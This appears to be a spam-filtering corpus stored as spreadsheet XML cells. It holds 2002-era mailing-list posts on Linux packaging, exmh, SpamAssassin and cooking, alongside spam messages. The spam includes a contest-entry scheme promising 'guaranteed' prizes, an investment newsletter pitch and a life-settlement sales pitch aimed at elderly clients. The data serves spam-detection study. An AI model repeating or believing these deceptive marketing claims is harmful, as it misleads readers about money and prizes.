 &gt; that I feel really uncomfortable with it : Things are just too limited and
 &gt; you're now asked to stick with the defaults. I've already switched back
 &gt; from Metacity to Sawfish, but for the main GNOME stuff like the panel and
 &gt; the control center... there are now too few options for "advanced users"
 &gt; like me who like to be able to configure as much as possible.
 &gt; 
 &gt; Let's see how it evolves... but the GNOME guys who decide seem to want to
 &gt; change everything to be as simple and limited as possible to not confuse
 &gt; the basic (lower then average IMHO) user. So in the meantime, I stick with
 &gt; GNOME 1.4 and I'm quite happy with how it performs in my daily tasks
 &gt; although it doesn't have the nice look of anti-aliased fonts (I mainly use
 &gt; and LCD screen and projector anyway).
 &gt; 
 &gt; &gt;     Problem is, though, Pango (a package that deals with international
 &gt; &gt;     font rendering) hasn't been made available to the apt repository on
 &gt; &gt;     Sunmore.net.
 &gt; 
 &gt; Maybe try grabbing it from the latest Red Hat Linux beta (Limbo) or from
 &gt; Rawhide...
 &gt; 
 &gt; &gt;     Who the heck do I contact for this, anyway?
 &gt; 
 &gt; Not me, sorry!
 &gt; 
 &gt; Matthias
 &gt; 
 &gt; -- 
 &gt; Matthias Saou                                World Trade Center
 &gt; -------------                                Edificio Norte 4 Planta
 &gt; System and Network Engineer                  08039 Barcelona, Spain
 &gt; Electronic Group Interactive                 Phone : +34 936 00 23 23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</si>
  <si>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Once upon a time, Ville wrote :
 &gt; Any plans for rolling Nessus RPMs for RH8?  Miss it already...
 Well, that's one of the 10 rpm-related mails leftover in my inbox I just
 mentionned privately ;-)
 As it's a big piece and needs some testing, I'm just bit lazy about it :-/
 I'll try to packages it asap, or at least put up a "testing" version first
 in case I fear some imperfections.
 Matthias
 -- 
 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
 Load : 0.17 0.17 0.12
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Cash Flow Doesn't Lie...Even After Today's Rally 
</t>
  </si>
  <si>
    <t xml:space="preserve">You are receiving this email because you signed up to 
 receive one of our free reports. If you would prefer 
 not to receive messages of this type, please 
 unsubscribe by following the instructions at the 
 bottom of this message.
 Dear Fool,
 Just before Enron plunged...
 ...16 of 17 Wall Street analysts were still urging you 
 to buy Enron's stock.  While the company piled up debt 
 and manufactured imaginary earnings, auditors gave the 
 balance sheet a big thumbs-up.  As investors lost 
 everything, Enron insiders pocketed millions.
 AND THAT should make every investor's blood boil!
 Frankly, the Enrons and Global Crossings of the world 
 infuriate me.  All the backroom manipulations dirty 
 dealing and cover-ups really make it hard to know who 
 you can trust.   And that is why we've created a NEW 
 investing service, "David &amp; Tom Gardner's Motley Fool 
 Stock Advisor" -- to bring the Motley Fool co-founders' 
 extraordinary commitment to honest stock analysis, 
 fair dealing and complete disclosure to investors like 
 you on a regular and timely basis.
 The Motley Fool, which David and Tom founded back in 
 1993, is dedicated to the principle that given the 
 right tools...the average guy can find great success in 
 every aspect of his financial life.
 And now, David and Tom are applying this principle -- and 
 their extensive investing experience -- to the new 
 "Motley Fool Stock Advisor."  
 But as you'll see, this service isn't just about 
 "buying more stocks."  OUR GOAL in publishing the 
 "Motley Fool Stock Advisor" is twofold:  To help you 
 gain the knowledge, confidence and resolve to make 
 money in the U.S. stock market...while avoiding the 
 biggest mistakes, as well.
 The Wall Street analysts touting Global Crossing said 
 its worldwide fiber-optics network would make it the 
 king of telecom.  Now these shares are WORTH NOTHING.  
 Microstrategy was the poster child of the technology 
 bubble-after earnings restatements, the stock now sits 
 99% OFF its high!  Kmart's lousy inventory management 
 and marketing incompetence helped drive the company 
 into BANKRUPTCY.
 WHAT ABOUT Nortel and Lucent-two of America's most 
 widely owned stocks.  Will they ever come back?  How 
 about AOL?  Does its merger with Time-Warner mean the 
 GLORY DAYS are over -- or have they just begun?   Are 90% 
 of all telecommunications companies truly in danger of 
 disappearing? If so, which will survive? Will great 
 old names like JP Morgan, Disney and Motorola recover?  
 Well, those are the sorts of questions David &amp; Tom 
 Gardner can help you answer at the "Motley Fool Stock 
 Advisor."  
 As they say, "Show us the money."  When it comes to 
 making promises, fast-talkers can fudge just about 
 anything.  But CASH FLOW doesn't lie.
 YOU CAN avoid a lot of big mistakes by simply making 
 sure a company has the cash coming in to pay its 
 bills.  And watching cash flow is also one of the best 
 ways to identify superstar companies -- far more reliable 
 than "earnings" that can be manipulated 8 ways to 
 Sunday.  Once you eliminate big losers from the 
 equation -- and target the true superstars -- you'll find 
 investing more fun...less stressful...and much more 
 profitable, as well.
 So forget about Wall Street's "damaged goods"-
 companies that have a boatload of debt and accounting 
 woes, as well.  Keep it SIMPLE instead.
 "Simple" means investing in companies that we all -- with 
 a little effort -- can understand.  Companies where we 
 know what businesses they're really in.  Companies 
 where the financial statements actually mean 
 something.  And companies easily recognizable as the 
 "best of breed."
 In the free report you received, "The One Stock That 
 Keeps Wall Street BUZZING," you read about one of 
 David &amp; Tom's very favorite investments: Starbucks.  
 Before this company came along, most folks just took 
 coffee for granted.  And certainly, no one proposed 
 any far-reaching business model built around it.  Yet 
 these innovators took a low-margin commodity and built 
 a near $3 BILLION company with more than 5000 
 retail outfits all around the world.
 Starbucks has been able to open new outlets based on 
 money it has earned from existing ones. That is an 
 astounding testament to its economic power.  At The 
 Motley Fool Stock Advisor we'll help you find and 
 truly understand the great investments, the companies 
 with solid balance sheets and real growth prospects.   
 Right now we're following companies such as:
 *America's most prestigious jeweler -- its brand name 
 has no rival.  With net margins of 59% on sales of 
 $1.6 Billion, this company is a great pick for solid 
 returns with low risk.   
 *This software company commands more than 25% of the 
 video game market.  Its shares have returned 6,000% 
 since its public debut in 1989.  An investment of 
 $5,000 in 1989 is now worth over $300,000.  The video 
 game market is expected to double by 2005 with this 
 company enjoying the lion's share of the growth.
 *This premier credit rating company has locked-in 
 demand for its reports on the creditworthiness of 
 borrowers holding $30 trillion of the world's debt.  
 It has a 20-year record of consistent sales and income 
 growth and is poised for another stellar year.
 YOU CAN TRY the "Motley Fool Stock Advisor" for six 
 full months 100% RISK-FREE.  If we don't prove its 
 worth to you, it doesn't cost you a dime.
 As a Charter Subscriber, you get the "Motley Fool 
 Stock Advisor" delivered to your home each month; a 
 monthly, between-issue, e-mail Fool Flash to help you 
 take full advantage of breaking news; full use of the 
 Motley Fool Stock Advisor subscriber-only Web site, 
 featuring current &amp; back newsletter issues...full 
 updates on all selected stocks...Q &amp; A...and more; 
 plus introductory Special Reports exclusively for new 
 subscribers.
 To join RISK-FREE, as a Charter Subscriber to "David &amp; 
 Tom Gardner's Motley Fool Stock Advisor," simply click 
 here now:
 http://www.ppi-orders.com/index.htm?promo_code=1UE733
 Sincerely yours,
 Mike Bell, Publisher
 "David &amp; Tom Gardner's Motley Fool Stock Advisor"
 P.S. Do you like BIG PROFITS?  In 1994, investment 
 pros sniffed at America Online's high-flying stock and 
 screamed, "Overvalued."  But the Gardners saw three 
 things they overlooked: 1) AOL was building the 
 premier stop in cyberspace; 2) They had a great 
 retention strategy; and 3) Millions of members paying 
 $$$ every month.
 So Tom and David bought it.  And today they're sitting 
 on whopping 4,120% gains.  So you see, while they do 
 structure their investing strategy to avoid big 
 blunders...they do make a lot of money, too.  To try the 
 "Motley Fool Stock Advisor" RISK-FREE, click here now:
 http://www.ppi-orders.com/index.htm?promo_code=1UE733
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 HOW TO UNSUBSCRIBE
 We hope this email message is of value to you. If 
 however, you do not wish to receive any of our future 
 messages, please unsubscribe by going to the following 
 web address:
 http://www.investorplace.com/newunsubscribe.php?q=66527235-1
 **Note if you unsubscribe by replying to this message 
 please use Unsubscribe or Remove in the subject line. 
 Mon Jul 29 17:04:26 2002
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Quake 3
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Aug 02, 2002 at 09:41:52AM +0100, Gregory McRandal (ext 722) wrote:
 &gt; I've installed Quake 3 onto my computer and it starts to run up ok but as
 &gt; soon as the graphics start it bails out.  It complains that there is an
 &gt; error in sis_drv.o,  the line before this says that it is starting Quake in
 &gt; 24 bit depth, now from http://www.winischhofer.net/linuxsis630.shtml I
 &gt; understand that the sis630 won't do 24 bit depth.  So is there a way to make
 &gt; Quake start up in 16 bit depth?  I've done some "google"ing but drawn a
 &gt; blank.....
 Hmm. Check to see what colour-depth your X session is running in. Try
 changing DefaultDepth to 16 (in /etc/X11/XF86Cnfig-4), and restarting X.
 Letting us know what distro you're using would help too.
 Steve
 -- 
 "Oh look, it's the Pigeon of Love."
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; I just had to jump in here as Carbonara is one of my favourites to make and 
 &gt; ask 
 &gt; what the hell are you supposed to use instead of cream? 
 Isn't it just basically a mixture of beaten egg and bacon (or pancetta, 
 really)? You mix in the raw egg to the cooked pasta and the heat of the pasta 
 cooks the egg. That's my understanding.
 Martin
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/mG3HAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: MORTGAGE LOANS WITH A 5.75% AVAILABLE!!!!!11284
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Ultrasound blood purifier tackles fat problem
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8199104,1440/
 Date: Not supplied
 Millions of tiny fat droplets are thought to damage the brains of most heart 
 surgery patients - sonic waves may help
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Jul 19, 2002 at 03:35:36PM +0100 or so it is rumoured hereabouts, 
 Niall O Broin thought:
 &gt; illustrates this admirably. The poster is in the form of a PDF file and to
 &gt; be honest, is best appreciated if you have access to a HP DesignJet or
 Speaking of HP Designjets, has anyone managed to utilise the full width of
 the paper on a HP Designjet 750c under RH7.x?  The HP can take a 24" wide
 roll while the driver (dnj650c) lists a paper size of 16x24.
 Unfortunately, this will print only in protrait mode so I get a 24"x24"
 page with an unused 8" strip down one side!  I'd like to be able to print
 24x&lt;infinity&gt; or whatever (even 24x30!) but I don't seem able to do so.
 Any thoughts?
 Conor
 -- 
 Conor Daly &lt;conor.daly@oceanfree.net&gt;
 Domestic Sysadmin :-)
 ---------------------
 Faenor.cod.ie
   6:49pm  up 57 days,  4:07,  0 users,  load average: 0.03, 0.03, 0.00
 Hobbiton.cod.ie
   6:38pm  up  1:15,  1 user,  load average: 0.03, 0.06, 0.04
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: when building a rpm i386-redhat-linux- is appended to man page
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; This is a common problem with some build files that think you're cross
 &gt; compiling, and when you really are, this is in fact a feature :-/
 &gt; 
 &gt; The workaround is to pass an extra argument to configure as follows :
 &gt; 
 &gt; %configure --program-prefix=%{?_program_prefix:%{_program_prefix}}
 Merci. It worked nicely.
 Pat
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [zzzzteana] Re: Megalithomania UnPissup
</t>
  </si>
  <si>
    <t xml:space="preserve">Understand, not enough caffeine absorbed yet this morning. (7:00AM here for
 me)
 DRS
 &gt; --- In forteana@y..., "Webmaster" &lt;webmaster@b...&gt; wrote:
 &gt; &gt;Right...Talking Stick!..but what the hell is "marathon/snickers, jif/cif
 &gt; &gt;and
 &gt; &gt;calls itself 'Secret Chiefs' "
 &gt; &gt;
 &gt; &gt;DRS
 &gt; &gt;
 &gt;
 &gt; Rebranding: taking something and changing nothing about it except its
 name.
 &gt; In the UK Marathon bars became Snickers bar, Jif cleaning fluid became Cif
 &gt; and Talking Stick became Secret Chiefs, y'know?
 &gt;
 &gt; Scott
 &gt; "at once a fun fair, a petrified forest, and the great temple of Amun at
 &gt; Karnak, itself drunk, and reeling in an eccentric earthquake"
 &gt;
 &gt;
 &gt; _________________________________________________________________
 &gt; Join the world's largest e-mail service with MSN Hotmail.
 &gt; http://www.hotmail.com
 &gt;
 &gt;
 &gt;
 &gt; To unsubscribe from this group, send an email to:
 &gt; forteana-unsubscribe@egroups.com
 &gt;
 &gt;
 &gt;
 &gt; Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/
 &gt;
 &gt;
 &gt;
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [SAdev] Who uses Spam Assassin this way?
</t>
  </si>
  <si>
    <t xml:space="preserve">I flag spam at 7.0 and drop it altogether at 20.0. I do lots of whitelisting
 and have never had a false positive over 20.0.
 Actually I save the 20-and-over spams to a file and occasionally
 double-check it.
 This allows me to keep over 75% of the spam out of my mailbox entirely - I
 have 3-4 messages a day in my Spam folder instead of 20-30.
 My system doesn't allow me to bounce messages with SA, but doing so doesn't
 really get anybody removed from spam lists anyway... I have addresses that
 have been bouncing for years that still get spam.
 --
 michael moncur   mgm at starlingtech.com   http://www.starlingtech.com/
 "Truth is more of a stranger than fiction."             -- Mark Twain
 &gt; -----Original Message-----
 &gt; From: spamassassin-devel-admin@example.sourceforge.net
 &gt; [mailto:spamassassin-devel-admin@lists.sourceforge.net]On Behalf Of Marc
 &gt; Perkel
 &gt; Sent: Sunday, July 21, 2002 11:15 AM
 &gt; To: spamassassin-devel@example.sourceforge.net
 &gt; Subject: [SAdev] Who uses Spam Assassin this way?
 &gt;
 &gt;
 &gt; I know most people use SA to just tag spam - but I use it to also delete
 &gt; and bounce spam.
 &gt;
 &gt; At 5 point I flag the message as spam and pass it on. At 18 points I
 &gt; bounce the spam as if the user doesn't exist - in the hopes of being
 &gt; removed from spam lists. I have modified scores on rules with large
 &gt; numbers of FP to .1 and at 18 points I get no FP at all now.
 &gt;
 &gt; Therefore - one of my goals in improving the rules is to try to get real
 &gt; spam up to 18 points. So if I have more good rules then real spam will
 &gt; hit more rules and raise the point value.
 &gt;
 &gt; Anyhow - I was wondering how many of you are doing what I'm doing?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</si>
  <si>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
 &gt; Chuck Murcko wrote:
 &gt;
 &gt; &gt; Heh, ten years ago saying the exact same words was most definitely not
 &gt; &gt; "parroting the party line".
 &gt; &gt;
 &gt; &gt; It was even less so thirty years ago. My story remains the same, take
 &gt; &gt; it or leave it. I've said the same words to white supremacists as to
 &gt; &gt; suburban leftist punks as to homeys as to French Irish, etc. etc.:
 &gt; &gt;
 &gt; &gt; I don't have to agree with anything you say. I *am* obligated to
 &gt; &gt; defend to the death your right to say it. I don't give a rat's ass
 &gt; &gt; where you say it, even in France. I don't care where the political
 &gt; &gt; pendulum has swung currently.
 &gt; &gt;
 &gt; &gt; Chuck
 &gt;
 &gt;
 &gt; I had to laugh at Rumsfield yesterday - when he was heckled by
 &gt; protestors, he said something like "They couldn't do that in Iraq."
 &gt; Meanwhile, from what I could tell, the protestors were being arrested.
 &gt;
 &gt; Owen
 Trying to shoutdown a speaker or being loud and rowdy while someone else is
 trying to speak (in the vernacular, 'getting in their face') is rude and
 disrespectful.  And persistently getting in someones face is assault, a
 criminal offense. If these people have something to say, they can say it
 with signs or get their own venue.  And here is something else to chew on...
 these protesters are NOT interested in changing anyones mind about what
 Rumsfield is saying. How likely are you to change someone's mind by being
 rude and disrespectful to them? Is this how to win friends and influence
 people? Either these folks are social misfits who have no understanding of
 human interactions (else they would try more constructive means to get their
 message across) or they are just out to get their rocks off regardless of
 how it affects other people, and that is immoral at best and downright evil
 at worst.
 Bill
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: If you like graphic novels/comics
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.thecliffguy.com/cliffs.htm
 Numerous artists drawing characters on a cliff.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Michael asked me to send this to you.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;
 &lt;meta name="GENERATOR" content="Microsoft FrontPage 5.0"&gt;
 &lt;meta name="ProgId" content="FrontPage.Editor.Document"&gt;
 &lt;title&gt;New Page 1&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF"&gt;
 &lt;table border="0" width="100%" height="100%" cellspacing="0" cellpadding="0"&gt;
   &lt;tr&gt;
     &lt;td width="100%" valign="middle" align="center"&gt;
       &lt;table border="0" width="468" cellspacing="0" cellpadding="0" height="823"&gt;
         &lt;tr&gt;
           &lt;td width="100%" height="823"&gt;&lt;font face="Courier New" size="2"&gt;Hi,&lt;br&gt;
             &lt;br&gt;
             Want to increase your chances of winning a big jackpot in those
             Internet contests?&lt;br&gt;
             &lt;br&gt;
             Michael Khalili, the famous programmer who you may have read about
             in USA Today and other newspapers, came up with a method that makes
             it &lt;b&gt;&lt;u&gt;hundreds of times easier to win online.&lt;/u&gt;&lt;/b&gt;&lt;br&gt;
             &lt;br&gt;
             He recently wrote a program that will AUTOMATICALLY enter you in
             online contests--over and over UNTIL YOU WIN (or tell it to stop).
             We at Grab.com are so excited by this system that we're putting it
             online for our members to use.&lt;br&gt;
             &lt;br&gt;
             &lt;br&gt;
             THE PRIZE IS YOURS - GUARANTEED!&lt;br&gt;
             &lt;br&gt;
             If you win a contest using this program, the prize is legally yours
             to keep--GUARANTEED! Our lawyers assured us that Michael's program
             is legal, and online contest sponsors have CONFIRMED that it doesn't
             violate their rules. &lt;b&gt;&lt;u&gt;So if you win a prize, you'll receive it.
             If you don't receive it, we'll pay you ourselves. GUARANTEED.&lt;/u&gt;&lt;/b&gt;&lt;br&gt;
             &lt;br&gt;
             &lt;br&gt;
             FREE TO USE.&lt;br&gt;
             &lt;br&gt;
             Best of all, this service is free to use. All you pay for is related
             network expenses--which only cost $1 for 7 days of the service.
             That's dozens of entries for what you'd usually pay to get a single
             lottery ticket!&lt;br&gt;
             &lt;br&gt;
             As a member in good standing of this mailing, &lt;b&gt;&lt;u&gt;we've already
             set up the automatic entry system for you.&lt;/u&gt;&lt;/b&gt; All that's left
             is for you to turn it on. Once you do, you can sit back and watch it
             enter you into contest after contest after contest after contest....&lt;br&gt;
             &lt;br&gt;
             &lt;br&gt;
             &lt;/font&gt;&lt;a HREF="http://r.mb00.net/s/c?1dx.2qbm.1.i7a.fsi52"&gt;&lt;font face="Courier New" size="5"&gt;Click
             here to begin!&lt;/font&gt;&lt;/a&gt;&lt;font face="Courier New" size="2"&gt;&lt;br&gt;
             &lt;br&gt;
             P.S. This system will continue to enter you into hundreds of free
             contests until you win (or cancel it).&lt;br&gt;
             &lt;br&gt;
             P.P.S. All the prizes you win are yours to keep--GUARANTEED!&lt;br&gt;
             &lt;br&gt;
             &lt;br&gt;
             &lt;br&gt;
             &lt;br&gt;
             &lt;br&gt;
             &lt;br&gt;
             &lt;br&gt;
             &lt;font face="arial, helvetica" size="1" color="#808080"&gt;&lt;center&gt;(C)
             Copyright Grab.com 2002.&lt;/center&gt;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;HTML&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;CENTER&gt;
 &lt;TABLE WIDTH="540" CELLSPACING=2 CELLPADDING=3 BORDER=0&gt;
 &lt;FORM METHOD=GET ACTION="http://i.mb00.net/cgi-bin/pmg_subscribe.pl"&gt;
 &lt;TR&gt;
   &lt;TD BGCOLOR="#DDDDDD"&gt;
   &lt;FONT FACE="helvetica,arial" SIZE="-1" COLOR="#000000"&gt;
     &lt;I&gt;Remove yourself from this list by either:&lt;/I&gt;
   &lt;/FONT&gt;
   &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
   &lt;TD BGCOLOR="#EEEEEE"&gt;
   &lt;FONT FACE="helvetica,arial" SIZE="-1" COLOR="#000000"&gt;
   Entering your email address below and clicking REMOVE:&lt;BR&gt;
     &lt;CENTER&gt;
     &lt;INPUT TYPE="hidden" NAME="list" VALUE="ebargains:*"&gt;
     &lt;INPUT TYPE="hidden" NAME="server_action" VALUE="Unsubscribe"&gt;
     &lt;INPUT TYPE="text" NAME="email_address" VALUE="cypherpunks@einstein.ssz.com" SIZE=25&gt;&lt;/FONT&gt;
     &lt;INPUT TYPE="submit" VALUE="REMOVE"&gt;
     &lt;/CENTER&gt;
   &lt;/FONT&gt;
   &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR ALIGN="CENTER"&gt;
   &lt;TD&gt;
   &lt;FONT FACE="helvetica,arial" SIZE="-1" COLOR="#000000"&gt;
     &lt;B&gt;&lt;I&gt;OR&lt;/I&gt;&lt;/B&gt;
   &lt;/FONT&gt;
   &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
   &lt;TD BGCOLOR="#EEEEEE"&gt;
   &lt;FONT FACE="helvetica,arial" SIZE="-1" COLOR="#000000"&gt;
   Reply to this message with the word &amp;quot;remove&amp;quot; in the subject line.
   &lt;/FONT&gt;
   &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/FORM&gt;
 &lt;TR ALIGN="CENTER"&gt;
   &lt;TD BGCOLOR="#FFFFFF" ALIGN="CENTER"&gt;
   &lt;FONT FACE="helvetica,arial" SIZE="1" COLOR="#000000"&gt;
   This message was sent to address cypherpunks@einstein.ssz.com
   &lt;/FONT&gt;
 &lt;!--
 X-PMG-Recipient: cypherpunks@einstein.ssz.com
 X-PMG-Msgid: 1027358272.17230
 X-PMG-Userid: ebargains:*
 --&gt;
 &lt;DIV ALIGN="CENTER"&gt;
 &lt;FONT FACE="helvetica,arial" SIZE="1" COLOR="#AAAAAA"&gt;pmguid:1dx.2qbm.fsi52&lt;/FONT&gt;&lt;/DIV&gt;&lt;BR CLEAR="ALL"&gt;
 &lt;IMG SRC="http://r.mb00.net/s/o?1dx.2qbm.0.fsi52" WIDTH=33 HEIGHT=12 BORDER=0 ALIGN="RIGHT" ALT="pmg"&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/CENTER&gt;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</si>
  <si>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Changed location of incoming mail. exmh not working!!
</t>
  </si>
  <si>
    <t xml:space="preserve">I use exmh 2.5 with procmail for presorting incoming mail and move it to
 the relevant folder using rcvstore.
 Recently, my incoming mail (or spool) location moved to another disk.
 I'm not quite clear how to reconfigure procmail/rcvstore/exmh to accept
 mail from the new location.
 There seems to be a variable in exmh-defaults (bgspool). It says at the
 top of the file not to edit these lines. So, I went ahead and edited it :-)
 That does not make a difference.
 It seems like procmail is the one that is actually reading the mail from
 my spool/incoming mail area and piping it to rcvstore. So, I need to
 configure that probably.
 Any idea how I would do this?
 Thanks
 Siva
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] Reject, Blackhole, or Fake No-User?
</t>
  </si>
  <si>
    <t xml:space="preserve">This is not directly SpamAssassin related, but more of a general
 dealing-with-SPAM issue.
 What is the best way to deal with SPAM during the SMTP transaction?
 There are domains and addresses that I know are SPAM at the 'MAIL
 FROM' and can deal with at the SMTP level. I have been, and I think
 most people, respond with a 5.7.1 code, a "permanent" error. That
 pretty much means, "Don't bother to try from that address again,
 you'll get the same error." People often add cathartic messages to
 accompany the 550 like, "Spammers must die."
 But this might not be the best way to go. You are telling the spammers
 that you are on to them. This may cause them to try other methods to
 get around your blocks. Is it perhaps better to blackhole the mail?
 That is, act like everything is OK during the SMTP transaction, but
 then just drop the mail into the bitbucket. (This is generally how
 SpamAssassin works since almost everyone uses it after the SMTP
 transaction has completed successfully.) Spammer thinks everything is
 going fine and has no reason to try new methods.
 Then there is a third possibility. Instead of returning a 550 code
 indicating you're on to the spammer, fake a 5.1.1 response which is
 saying "mailbox does not exist." This would be in the hopes that some
 spammers out there actually remove names reported as non-existent from
 their lists. I know, a slim hope, but even if only a few do, it can
 lower the incidence.
 So, what are the arguments for each? Do spammers even look at _any_ of
 the bounce messages they get? The volume of bounces must be
 huge. Personally, I'm starting to think blackholes are the way to
 go... But sending back that "Spammer die, die, die," or stock "Access
 DEE-NIED!" (my ephasis added) message can be pretty satisfying. ;)
 -- 
 Crist J. Clark                     |     cjclark@alum.mit.edu
                                    |     cjclark@jhu.edu
 http://people.freebsd.org/~cjc/    |     cjc@freebsd.org
 -------------------------------------------------------
 In remembrance
 www.osdn.com/911/
 _______________________________________________
 Spamassassin-talk mailing list
 Spamassassin-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Patients to get chemically "sterilised" blood
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8443954,1440/
 Date: Not supplied
 Hundreds of US transfusion patients are set to receive red blood cells cleaned 
 with compounds that inactivate viruses and bacteria
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_1217613150P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Anders Eriksson &lt;aeriksson@fastmail.fm&gt;
 &gt; Date:  Mon, 19 Aug 2002 21:44:48 +0200
 &gt;
 &gt; 
 &gt; Just cvs up'ed and nowadays Catch-up Unseen is __extremely__ slow on 
 &gt; large (&gt;100 msgs) unseen sequences. Anybody else having this problem?
 I'll take the blame.
 The reason, I suspect, is that we're needlessly reading the .sequences file 
 multiple times because of other sequences.  I need to make the code much 
 smarter about handling that file, but first I have a few other fish to fry in 
 my rather large patch that's on it's way.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_1217613150P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9YVQLK9b4h5R0IUIRAi47AJ4rVruKV1jEX9NVMEAFZR9grNn3YgCfcUlD
 MTk68Vxnxl3UUoU3yA4spLg=
 =ypKd
 -----END PGP SIGNATURE-----
 --==_Exmh_1217613150P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_0007_01C24D19.1DD0A790
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
  An Additional Income Stream
  from your current book of business!
   =09
  	  	 	 =09
  	 Agent Commission:
 $92,000=20
  Client:
  87-year-old male
  82-Year-old female
  Result:
  $2,300,000 second to die
  policy, minimal cash value.  Policy was no longer
  required. Insured utilized a
  life settlement and received
  $300,000. Agent Commission:
 $30,000=20
  Client:
  70-year-old male with health complications
  Result:
  $1,000,000 policy with small
  cash value. Insured utilized
  a life settlement and
  received $300,000. Agent Commission:
 $90,000=20
  Client:
  89-year-old female
  Result:
  $2,000,000 policy with an
  annual premium of $110,000.
  Policy expires at age 95.
  Insured utilized a life
  settlement and received
  $325,000.=20
  	  	 	 =09
 =20
 Multiple opportunities to earn commissions
 from one strategy!=20
 	If any of your elderly client=92s health, personal, or financial
 needs or circumstances have changed since the original life policy was
 issued you have the opportunity to create an additional income stream
 with Life Settlements:
  ? Earn a referral fee from a life settlement transaction.
 ? Trailer commission on the policy for the agent of record.
 ? Earn investment or annuity commissions from the capital created by=20
    the life settlement transaction.
 ? Earn a commission on new life insurance products that better suit=20
    your client=92s current needs.
 ? Earn a commission on the conversion if the policy being considered
    is a term product.
 ?Earn additional commissions for referring other agents or agencies
    to The Life Settlement Alliance.=20
 =20
 Call today for more information!
  800-871-9440=97 or =97=20
 Please fill out the form below for more information	=20
 Name:	 	  =09
 E-mail:	 	=20
 Phone:	 	=20
 City:	 	 State:	 	=20
  	    =09
 =20
 The Life Settlement Alliance &lt;http://www.lsalliance.com&gt; 	=20
 We don't want anyone to receive our mailings who does not wish to. This
 is professional communication sent to insurance professionals. To be
 removed from this mailing list, DO NOT REPLY to this message. Instead,
 go here: http://www.Insuranceiq.com/optout
 &lt;http://www.Insuranceiq.com/optout/&gt;=20
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt; =20
 ------=_NextPart_000_0007_01C24D19.1DD0A790
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
